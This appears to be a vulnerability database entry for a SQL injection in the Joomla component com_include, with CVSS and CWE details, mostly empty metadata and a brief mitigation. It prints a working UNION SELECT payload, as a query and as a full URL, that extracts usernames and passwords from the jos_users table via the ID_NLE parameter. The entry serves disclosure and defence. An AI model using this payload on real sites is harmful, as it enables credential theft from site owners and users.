vendor:
com_include
by:
DevilZ TM By D3v1l
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_include
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Unknown
Joomla Component com_include SQL Injection Vulnerability
An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'ID_NLE' of the 'com_include' component. An example of a malicious query is '-1 UNION SELECT concat(username,0x3a,password) FROM jos_users' which can be sent to the vulnerable parameter as 'http://127.0.0.1/index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1 UNION SELECT concat(username,0x3a,password) FROM jos_users'
Mitigation:
Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.